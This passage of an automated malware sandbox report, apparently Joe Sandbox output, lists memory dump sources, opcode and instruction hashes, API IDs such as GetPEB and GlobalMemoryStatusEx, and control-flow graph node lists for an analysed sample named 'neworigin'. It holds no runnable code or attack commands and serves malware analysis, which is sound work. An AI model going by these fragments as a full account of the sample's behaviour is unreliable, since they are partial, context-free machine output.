                                                                                                                                • Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: malloc
                                                                                                                                • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                                • API String ID: 2803490479-2443507578
                                                                                                                                • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                                • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                                • String ID: D`GuD`Gu$D`GuD`Gu
                                                                                                                                • API String ID: 4108700736-1111891142
                                                                                                                                • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                                • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                                • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                                • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 43 4bf794-4bf79e 44 4bf7bf-4bf7c1 43->44 45 4bf7a0 43->45 46 4bf7ab-4bf7ad 44->46 47 4bf7c3 44->47 48 4bf7b2-4bf7bb 45->48 49 4bf7a2 45->49 50 4bf7af 46->50 51 4bf7a6-4bf7aa 46->51 47->46 54 4bf7c5-4bf7c7 47->54 52 4bf7c9-4bf7d0 48->52 53 4bf7bd 48->53 49->48 55 4bf7a4 49->55 50->51 56 4bf7b1 50->56 51->46 52->44 57 4bf7d2 52->57 53->44 53->52 54->52 55->51 56->48 57->44 58 4bf7d4-4bf7d9 57->58 59 4bf7eb-4bf7f0 58->59 60 4bf7db 58->60 61 4bf7f2-4bf7f6 59->61 62 4bf806-4bf809 59->62 60->59 63 4bf7dd 60->63 61->62 64 4bf7f8 61->64 65 4bf80b 62->65 66 4bf7e5-4bf7e8 62->66 63->43 67 4bf7df 63->67 68 4bf7fa 64->68 69 4bf811-4bf815 64->69 65->66 70 4bf80d-4bf80f 65->70 67->48 71 4bf7e1-4bf7e3 67->71 68->69 72 4bf7fc 68->72 69->62 73 4bf817-4bf81e 69->73 70->69 71->66 72->44 74 4bf7fe 72->74 75 4bf800-4bf805 73->75 76 4bf820 73->76 74->48 74->75 75->62 76->75 77 4bf822 76->77 77->44 78 4bf824 77->78 78->43 79 4bf82a 78->79 80 4bf834-4bf83b 79->80 81 4bf83d 80->81 82 4bf86c-4bf873 80->82 81->82 83 4bf83f 81->83 84 4bf889-4bf88c 82->84 85 4bf875-4bf87b 82->85 87 4bf840-4bf841 83->87 85->84 86 4bf87d 85->86 88 4bf8a8-4bf8ae 86->88 89 4bf87f 86->89 90 4bf883-4bf885 87->90 91 4bf843 87->91 93 4bf887 88->93 96 4bf8b0 88->96 89->88 92 4bf881 89->92 90->93 94 4bf864-4bf868 90->94 91->90 95 4bf845 91->95 92->90 93->84 98 4bf86a 94->98 99 4bf891-4bf894 94->99 95->43 97 4bf84b 95->97 100 4bf84d-4bf84f 96->100 101 4bf8b2 96->101 97->99 97->100 98->82 98->99 99->84 102 4bf896 99->102 100->94 103 4bf851 100->103 101->100 104 4bf8b4-4bf8ba GetPEB 101->104 105 4bf85b-4bf863 102->105 106 4bf898 102->106 103->94 107 4bf853 103->107 106->87 108 4bf89a 106->108 107->80 109 4bf855 107->109 108->87 110 4bf89c 108->110 109->75 111 4bf857-4bf859 109->111 110->66 112 4bf8a2 110->112 111->105 112->48 112->88
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                                • Instruction ID: 9dce6d6b8b05ab0a555f06944759f9cc391f65fca432f5fc4cfe5cd17794a38a
                                                                                                                                • Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                                • Instruction Fuzzy Hash: 9631F3329052446ACF32A96C5C146F77B64AB62BB0F1C45F7E44C86792DB2C8C4DC2BC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                                • Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
                                                                                                                                • Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                                • Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:13.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:3
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 24056 16befe8 24057 16bf036 GlobalMemoryStatusEx 24056->24057 24058 16bf066 24057->24058
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e26de68c7a919418f37afff0305f28b5e14ea6f563f4be577782884d1f6a4523
                                                                                                                                • Instruction ID: 332e5ee61ec0a1a1a5fbfc7ca7d8624732abdd15b7fc90c2a596810f1ceadf98
                                                                                                                                • Opcode Fuzzy Hash: e26de68c7a919418f37afff0305f28b5e14ea6f563f4be577782884d1f6a4523
                                                                                                                                • Instruction Fuzzy Hash: 3FA20234A002098FDBA4DF68C584B9DB7F2FB49324F5585A9D409AB361DB35EE85CF80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8aef0ea6c70ed2e21071f585ed9598675237d6a803a755a932e9dd0ce5b3c2ca
                                                                                                                                • Instruction ID: 6f6f2dc5e0469b7ee3c7f7e71975c6b6e8583b1084812cd90f9bb2818424401a
                                                                                                                                • Opcode Fuzzy Hash: 8aef0ea6c70ed2e21071f585ed9598675237d6a803a755a932e9dd0ce5b3c2ca
                                                                                                                                • Instruction Fuzzy Hash: 13627F34A0020A9FDB54DB68D594AADB7F2FF84364F148469E806EB390DB35ED46CB90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1580 6dcc2a0-6dcc2c0 1581 6dcc2c2-6dcc2c5 1580->1581 1582 6dcc2c7-6dcc2cd 1581->1582 1583 6dcc2d2-6dcc2d5 1581->1583 1582->1583 1584 6dcc2dc-6dcc2e5 1583->1584 1585 6dcc2d7-6dcc2da 1583->1585 1587 6dcc2eb 1584->1587 1588 6dcc500-6dcc509 1584->1588 1585->1584 1586 6dcc2f0-6dcc2f3 1585->1586 1591 6dcc314-6dcc317 1586->1591 1592 6dcc2f5-6dcc30f 1586->1592 1587->1586 1589 6dcc50f-6dcc516 1588->1589 1590 6dcc637-6dcc66d 1588->1590 1595 6dcc51b-6dcc51e 1589->1595 1603 6dcc66f-6dcc672 1590->1603 1593 6dcc32e-6dcc331 1591->1593 1594 6dcc319-6dcc31c 1591->1594 1592->1591 1601 6dcc34a-6dcc34d 1593->1601 1602 6dcc333-6dcc345 1593->1602 1594->1590 1598 6dcc322-6dcc329 1594->1598 1599 6dcc520-6dcc53c 1595->1599 1600 6dcc541-6dcc544 1595->1600 1598->1593 1599->1600 1606 6dcc54c-6dcc54f 1600->1606 1607 6dcc546-6dcc547 1600->1607 1604 6dcc34f-6dcc375 1601->1604 1605 6dcc37a-6dcc37d 1601->1605 1602->1601 1610 6dcc674-6dcc68d 1603->1610 1611 6dcc692-6dcc695 1603->1611 1604->1605 1608 6dcc3df-6dcc3e2 1605->1608 1609 6dcc37f-6dcc3da 1605->1609 1614 6dcc570-6dcc573 1606->1614 1615 6dcc551-6dcc56b 1606->1615 1607->1606 1618 6dcc40e-6dcc411 1608->1618 1619 6dcc3e4-6dcc409 1608->1619 1609->1608 1610->1611 1620 6dcc6ac-6dcc6af 1611->1620 1621 6dcc697-6dcc6a5 1611->1621 1616 6dcc57d-6dcc580 1614->1616 1617 6dcc575-6dcc578 1614->1617 1615->1614 1623 6dcc586-6dcc589 1616->1623 1624 6dcc4a1-6dcc4a4 1616->1624 1617->1616 1628 6dcc43e-6dcc441 1618->1628 1629 6dcc413-6dcc439 1618->1629 1619->1618 1630 6dcc6b1-6dcc6cd 1620->1630 1631 6dcc6d2-6dcc6d5 1620->1631 1648 6dcc6e7-6dcc700 1621->1648 1649 6dcc6a7 1621->1649 1634 6dcc5aa-6dcc5ad 1623->1634 1635 6dcc58b-6dcc5a5 1623->1635 1624->1594 1633 6dcc4aa 1624->1633 1639 6dcc44e-6dcc451 1628->1639 1640 6dcc443-6dcc449 1628->1640 1629->1628 1630->1631 1641 6dcc6d7-6dcc6e1 1631->1641 1642 6dcc6e2-6dcc6e5 1631->1642 1643 6dcc4af-6dcc4b2 1633->1643 1645 6dcc5af-6dcc5b2 1634->1645 1646 6dcc5b7-6dcc5ba 1634->1646 1635->1634 1651 6dcc458-6dcc45b 1639->1651 1652 6dcc453-6dcc455 1639->1652 1640->1639 1642->1648 1653 6dcc70d-6dcc70f 1642->1653 1655 6dcc4ce-6dcc4d1 1643->1655 1656 6dcc4b4-6dcc4c3 1643->1656 1645->1646 1659 6dcc5bc-6dcc5d6 1646->1659 1660 6dcc5db-6dcc5de 1646->1660 1676 6dcc71f-6dcc72b 1648->1676 1699 6dcc702-6dcc70c 1648->1699 1649->1620 1662 6dcc45d-6dcc482 1651->1662 1663 6dcc487-6dcc48a 1651->1663 1652->1651 1664 6dcc716-6dcc719 1653->1664 1665 6dcc711 1653->1665 1666 6dcc4fb-6dcc4fe 1655->1666 1667 6dcc4d3-6dcc4f6 1655->1667 1656->1607 1688 6dcc4c9 1656->1688 1659->1660 1668 6dcc5e8-6dcc5eb 1660->1668 1669 6dcc5e0-6dcc5e5 1660->1669 1662->1663 1674 6dcc49c-6dcc49f 1663->1674 1675 6dcc48c-6dcc497 1663->1675 1664->1603 1664->1676 1665->1664 1666->1588 1666->1595 1667->1666 1682 6dcc5ed-6dcc5f4 1668->1682 1683 6dcc5ff-6dcc602 1668->1683 1669->1668 1674->1624 1674->1643 1675->1674 1677 6dcc8cb-6dcc8d5 1676->1677 1678 6dcc731-6dcc73a 1676->1678 1686 6dcc8d6-6dcc90e 1678->1686 1687 6dcc740-6dcc760 1678->1687 1682->1617 1691 6dcc5fa 1682->1691 1692 6dcc61a-6dcc61c 1683->1692 1693 6dcc604-6dcc615 1683->1693 1706 6dcc910-6dcc913 1686->1706 1713 6dcc8b9-6dcc8c5 1687->1713 1714 6dcc766-6dcc76f 1687->1714 1688->1655 1691->1683 1696 6dcc61e 1692->1696 1697 6dcc623-6dcc626 1692->1697 1693->1692 1696->1697 1697->1581 1704 6dcc62c-6dcc636 1697->1704 1710 6dccacf-6dccad2 1706->1710 1711 6dcc919-6dcc927 1706->1711 1715 6dccad4-6dccaf0 1710->1715 1716 6dccaf5-6dccaf7 1710->1716 1719 6dcc92e-6dcc930 1711->1719 1713->1677 1713->1678 1714->1686 1718 6dcc775-6dcc7a4 call 6dc6698 1714->1718 1715->1716 1720 6dccafe-6dccb01 1716->1720 1721 6dccaf9 1716->1721 1737 6dcc7e6-6dcc7fc 1718->1737 1738 6dcc7a6-6dcc7de 1718->1738 1724 6dcc947-6dcc971 1719->1724 1725 6dcc932-6dcc935 1719->1725 1720->1706 1722 6dccb07-6dccb10 1720->1722 1721->1720 1732 6dccac4-6dccace 1724->1732 1733 6dcc977-6dcc980 1724->1733 1725->1722 1735 6dcca9d-6dccac2 1733->1735 1736 6dcc986-6dcca95 call 6dc6698 1733->1736 1735->1722 1736->1733 1787 6dcca9b 1736->1787 1743 6dcc7fe-6dcc812 1737->1743 1744 6dcc81a-6dcc830 1737->1744 1738->1737 1743->1744 1750 6dcc84e-6dcc861 1744->1750 1751 6dcc832-6dcc846 1744->1751 1759 6dcc86f 1750->1759 1760 6dcc863-6dcc86d 1750->1760 1751->1750 1761 6dcc874-6dcc876 1759->1761 1760->1761 1763 6dcc878-6dcc87d 1761->1763 1764 6dcc8a7-6dcc8b3 1761->1764 1765 6dcc87f-6dcc889 1763->1765 1766 6dcc88b 1763->1766 1764->1713 1764->1714 1768 6dcc890-6dcc892 1765->1768 1766->1768 1768->1764 1769 6dcc894-6dcc8a0 1768->1769 1769->1764 1787->1732
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a9f3a7879c03dc3a3f2a242f161994736b97b9fe658b47af62e27a34de45e7f8
                                                                                                                                • Instruction ID: 9ab314cbe5c784319a1501ff053ffb850f85e001bc2cc6d03605c39ba0889877
                                                                                                                                • Opcode Fuzzy Hash: a9f3a7879c03dc3a3f2a242f161994736b97b9fe658b47af62e27a34de45e7f8
                                                                                                                                • Instruction Fuzzy Hash: 20325F35A1020A9FDF54DF68D990BAEB7B6FB88320F108529D509EB350DB39EC41CB95

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1788 6dc56b8-6dc56d5 1789 6dc56d7-6dc56da 1788->1789 1790 6dc56dc-6dc56f2 1789->1790 1791 6dc56f7-6dc56fa 1789->1791 1790->1791 1792 6dc56fc-6dc570c 1791->1792 1793 6dc5711-6dc5714 1791->1793 1792->1793 1795 6dc573a-6dc573d 1793->1795 1796 6dc5716-6dc5735 1793->1796 1798 6dc573f-6dc5742 1795->1798 1799 6dc5747-6dc574a 1795->1799 1796->1795 1798->1799 1800 6dc574c-6dc5752 1799->1800 1801 6dc5757-6dc575a 1799->1801 1800->1801 1803 6dc575c-6dc575d 1801->1803 1804 6dc5762-6dc5765 1801->1804 1803->1804 1805 6dc576c-6dc576f 1804->1805 1806 6dc5767-6dc5769 1804->1806 1808 6dc57ad-6dc57b3 1805->1808 1809 6dc5771-6dc5774 1805->1809 1806->1805 1810 6dc57b9 1808->1810 1811 6dc5865-6dc5873 1808->1811 1812 6dc5776-6dc577d 1809->1812 1813 6dc5782-6dc5785 1809->1813 1814 6dc57be-6dc57c1 1810->1814 1819 6dc587a-6dc587d 1811->1819 1812->1813 1815 6dc5794-6dc5797 1813->1815 1816 6dc5787-6dc578d 1813->1816 1817 6dc57d3-6dc57d6 1814->1817 1818 6dc57c3-6dc57c8 1814->1818 1822 6dc57a8-6dc57ab 1815->1822 1823 6dc5799-6dc579d 1815->1823 1820 6dc578f 1816->1820 1821 6dc57f4-6dc57fa 1816->1821 1825 6dc57ef-6dc57f2 1817->1825 1826 6dc57d8-6dc57ea 1817->1826 1818->1798 1824 6dc57ce 1818->1824 1827 6dc5882-6dc5884 1819->1827 1820->1815 1828 6dc5800-6dc580b 1821->1828 1829 6dc58a2-6dc58cb 1821->1829 1822->1808 1822->1814 1830 6dc5894-6dc58a1 1823->1830 1831 6dc57a3 1823->1831 1824->1817 1825->1821 1832 6dc582d-6dc5830 1825->1832 1826->1825 1833 6dc588b-6dc588e 1827->1833 1834 6dc5886 1827->1834 1828->1829 1835 6dc5811-6dc581e 1828->1835 1844 6dc58d5-6dc58d8 1829->1844 1831->1822 1838 6dc5848-6dc584b 1832->1838 1839 6dc5832-6dc5843 1832->1839 1833->1789 1833->1830 1834->1833 1835->1829 1837 6dc5824-6dc5828 1835->1837 1837->1832 1841 6dc584d-6dc5856 1838->1841 1842 6dc5857-6dc585a 1838->1842 1839->1838 1842->1816 1845 6dc5860-6dc5863 1842->1845 1846 6dc58da-6dc58e1 1844->1846 1847 6dc58e2-6dc58e5 1844->1847 1845->1811 1845->1827 1848 6dc58f9-6dc58fc 1847->1848 1849 6dc58e7-6dc58ee 1847->1849 1852 6dc591e-6dc5921 1848->1852 1853 6dc58fe-6dc5902 1848->1853 1850 6dc59be-6dc59c5 1849->1850 1851 6dc58f4 1849->1851 1851->1848 1856 6dc5943-6dc5946 1852->1856 1857 6dc5923-6dc5927 1852->1857 1854 6dc5908-6dc5910 1853->1854 1855 6dc59c6-6dc5a03 1853->1855 1854->1855 1858 6dc5916-6dc5919 1854->1858 1868 6dc5a05-6dc5a08 1855->1868 1860 6dc5948-6dc594c 1856->1860 1861 6dc5960-6dc5963 1856->1861 1857->1855 1859 6dc592d-6dc5935 1857->1859 1858->1852 1859->1855 1865 6dc593b-6dc593e 1859->1865 1860->1855 1866 6dc594e-6dc5956 1860->1866 1862 6dc597b-6dc597e 1861->1862 1863 6dc5965-6dc5976 1861->1863 1869 6dc598f-6dc5992 1862->1869 1870 6dc5980-6dc598a 1862->1870 1863->1862 1865->1856 1866->1855 1867 6dc5958-6dc595b 1866->1867 1867->1861 1872 6dc5a0a-6dc5a1c 1868->1872 1873 6dc5a27-6dc5a2a 1868->1873 1874 6dc59ac-6dc59ae 1869->1874 1875 6dc5994-6dc5998 1869->1875 1870->1869 1888 6dc5d6e-6dc5d80 1872->1888 1889 6dc5a22 1872->1889 1877 6dc5a2c-6dc5a3e 1873->1877 1878 6dc5a49-6dc5a4c 1873->1878 1880 6dc59b5-6dc59b8 1874->1880 1881 6dc59b0 1874->1881 1875->1855 1879 6dc599a-6dc59a2 1875->1879 1893 6dc5a44 1877->1893 1894 6dc5d95-6dc5d9a 1877->1894 1884 6dc5a4e-6dc5a53 1878->1884 1885 6dc5a56-6dc5a59 1878->1885 1879->1855 1883 6dc59a4-6dc59a7 1879->1883 1880->1844 1880->1850 1881->1880 1883->1874 1884->1885 1886 6dc5a5b-6dc5a6e 1885->1886 1887 6dc5a71-6dc5a74 1885->1887 1891 6dc5a7a-6dc5be6 1887->1891 1892 6dc5d34-6dc5d37 1887->1892 1888->1894 1904 6dc5d82 1888->1904 1889->1873 1937 6dc5bec-6dc5bf3 1891->1937 1938 6dc5d1e-6dc5d31 1891->1938 1892->1891 1896 6dc5d3d-6dc5d40 1892->1896 1893->1878 1895 6dc5d9d-6dc5da0 1894->1895 1899 6dc5dbb-6dc5dbd 1895->1899 1900 6dc5da2-6dc5db4 1895->1900 1901 6dc5d47-6dc5d4a 1896->1901 1902 6dc5d42-6dc5d44 1896->1902 1907 6dc5dbf 1899->1907 1908 6dc5dc4-6dc5dc7 1899->1908 1900->1894 1914 6dc5db6 1900->1914 1905 6dc5d4c-6dc5d5e 1901->1905 1906 6dc5d69-6dc5d6c 1901->1906 1902->1901 1909 6dc5d87-6dc5d8a 1904->1909 1905->1886 1916 6dc5d64 1905->1916 1906->1888 1906->1909 1907->1908 1908->1868 1911 6dc5dcd-6dc5dd6 1908->1911 1909->1891 1913 6dc5d90-6dc5d93 1909->1913 1913->1894 1913->1895 1914->1899 1916->1906 1939 6dc5bf9-6dc5c2b 1937->1939 1940 6dc5ca6-6dc5cad 1937->1940 1951 6dc5c2d 1939->1951 1952 6dc5c30-6dc5c71 1939->1952 1940->1938 1942 6dc5caf-6dc5ce2 1940->1942 1953 6dc5ce4 1942->1953 1954 6dc5ce7-6dc5d14 1942->1954 1951->1952 1962 6dc5c89-6dc5c90 1952->1962 1963 6dc5c73-6dc5c84 1952->1963 1953->1954 1954->1911 1965 6dc5c98-6dc5c9a 1962->1965 1963->1911 1965->1911
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 89c2bf8ea3256eda32d31c155d8c4045f185a99cbd390e4061598350787e82c1
                                                                                                                                • Instruction ID: 56a7dc18293de932163d94448bad106940cde57fc272a8b898a12d6982afbab0
                                                                                                                                • Opcode Fuzzy Hash: 89c2bf8ea3256eda32d31c155d8c4045f185a99cbd390e4061598350787e82c1
                                                                                                                                • Instruction Fuzzy Hash: EC12B675F0021A9FDF64DB64E880BAEB7B2EF85320F148469D8559B390DB35EC51CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3e16a34aea951078af256eec4c0ab9396a1eb1d8142043c539463cdf44972817
                                                                                                                                • Instruction ID: cfad44bb2969d754cf31a0c7bcda66bfa7b8f2d5c1528072776fab11b37266cf
                                                                                                                                • Opcode Fuzzy Hash: 3e16a34aea951078af256eec4c0ab9396a1eb1d8142043c539463cdf44972817
                                                                                                                                • Instruction Fuzzy Hash: F7226D70E1020E9BEF64DB68D481BADB7B2FB89320F60852AD455EB391DB35DC41CB91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2695 6dc3178-6dc3199 2696 6dc319b-6dc319e 2695->2696 2697 6dc31c4-6dc31c7 2696->2697 2698 6dc31a0-6dc31bf 2696->2698 2699 6dc31cd-6dc31ec 2697->2699 2700 6dc3968-6dc396a 2697->2700 2698->2697 2708 6dc31ee-6dc31f1 2699->2708 2709 6dc3205-6dc320f 2699->2709 2701 6dc396c 2700->2701 2702 6dc3971-6dc3974 2700->2702 2701->2702 2702->2696 2704 6dc397a-6dc3983 2702->2704 2708->2709 2710 6dc31f3-6dc3203 2708->2710 2713 6dc3215-6dc3224 2709->2713 2710->2713 2821 6dc3226 call 6dc3998 2713->2821 2822 6dc3226 call 6dc3990 2713->2822 2714 6dc322b-6dc3230 2715 6dc323d-6dc351a 2714->2715 2716 6dc3232-6dc3238 2714->2716 2737 6dc395a-6dc3967 2715->2737 2738 6dc3520-6dc35cf 2715->2738 2716->2704 2747 6dc35f8 2738->2747 2748 6dc35d1-6dc35f6 2738->2748 2749 6dc3601-6dc3614 2747->2749 2748->2749 2752 6dc361a-6dc363c 2749->2752 2753 6dc3941-6dc394d 2749->2753 2752->2753 2756 6dc3642-6dc364c 2752->2756 2753->2738 2754 6dc3953 2753->2754 2754->2737 2756->2753 2757 6dc3652-6dc365d 2756->2757 2757->2753 2758 6dc3663-6dc3739 2757->2758 2770 6dc373b-6dc373d 2758->2770 2771 6dc3747-6dc3777 2758->2771 2770->2771 2775 6dc3779-6dc377b 2771->2775 2776 6dc3785-6dc3791 2771->2776 2775->2776 2777 6dc37f1-6dc37f5 2776->2777 2778 6dc3793-6dc3797 2776->2778 2779 6dc37fb-6dc3837 2777->2779 2780 6dc3932-6dc393b 2777->2780 2778->2777 2781 6dc3799-6dc37c3 2778->2781 2791 6dc3839-6dc383b 2779->2791 2792 6dc3845-6dc3853 2779->2792 2780->2753 2780->2758 2788 6dc37c5-6dc37c7 2781->2788 2789 6dc37d1-6dc37ee 2781->2789 2788->2789 2789->2777 2791->2792 2795 6dc386a-6dc3875 2792->2795 2796 6dc3855-6dc3860 2792->2796 2799 6dc388d-6dc389e 2795->2799 2800 6dc3877-6dc387d 2795->2800 2796->2795 2801 6dc3862 2796->2801 2805 6dc38b6-6dc38c2 2799->2805 2806 6dc38a0-6dc38a6 2799->2806 2802 6dc387f 2800->2802 2803 6dc3881-6dc3883 2800->2803 2801->2795 2802->2799 2803->2799 2810 6dc38da-6dc392b 2805->2810 2811 6dc38c4-6dc38ca 2805->2811 2807 6dc38a8 2806->2807 2808 6dc38aa-6dc38ac 2806->2808 2807->2805 2808->2805 2810->2780 2812 6dc38cc 2811->2812 2813 6dc38ce-6dc38d0 2811->2813 2812->2810 2813->2810 2821->2714 2822->2714
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cdc652ca29fd111b3a0f342774d1363061defa58f3bc28fc289da63f33eadbff
                                                                                                                                • Instruction ID: 3690589b7244eb54ea70f0a554c1e74b4950b8b3335de8a3f812cd541424b309
                                                                                                                                • Opcode Fuzzy Hash: cdc652ca29fd111b3a0f342774d1363061defa58f3bc28fc289da63f33eadbff
                                                                                                                                • Instruction Fuzzy Hash: C8322E31E1061ACBCB14EF75C850A9DF7B6FF89310F21C66AD449A7260EF349985CB90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
